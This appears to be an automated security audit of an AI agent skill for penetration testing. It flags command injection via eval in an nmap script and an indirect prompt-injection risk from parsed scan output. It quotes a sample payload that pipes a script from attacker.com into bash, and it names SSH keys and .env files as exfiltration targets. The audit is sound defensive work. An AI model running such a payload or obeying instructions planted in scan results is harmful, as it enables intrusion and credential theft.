performing-security-testing

Fail

Audited by Gen Agent Trust Hub on May 8, 2026

Risk Level: HIGH
COMMAND_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION]: The shell script assets/nmap_scan_template.sh contains a severe command injection vulnerability. On line 132, it uses the eval command to execute the NMAP_COMMAND string. This string is constructed using the $TARGET variable (line 126), which is assigned directly from the first command-line argument (TARGET="$1" on line 124) without any sanitization, escaping, or validation. An attacker could exploit this by providing a target string containing shell metacharacters, such as 127.0.0.1; curl http://attacker.com/shell.sh | bash, leading to arbitrary code execution.
  • [DATA_EXFILTRATION]: While no explicit exfiltration logic was found, the command injection vulnerability in assets/nmap_scan_template.sh can be used to harvest environment variables, local files (like ~/.ssh/id_rsa or .env files), or cloud metadata, and transmit them to an external server.
  • [PROMPT_INJECTION]: The skill is designed to automate the parsing of security scan reports from tools like Nmap and Nessus. This represents an indirect prompt injection surface where a malicious target could return specially crafted service headers or version strings that, when parsed by the agent, influence its behavior or report generation.
      * Ingestion points: scripts/report_parser.py (referenced in scripts/README.md).
      * Boundary markers: Absent in the provided templates.
      * Capability inventory: File read/write, Bash execution (specified in SKILL.md).
      * Sanitization: No evidence of input sanitization or output encoding was found in the provided files.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: May 8, 2026, 06:57 PM
Security Audit — agent-trust-hub — performing-security-testing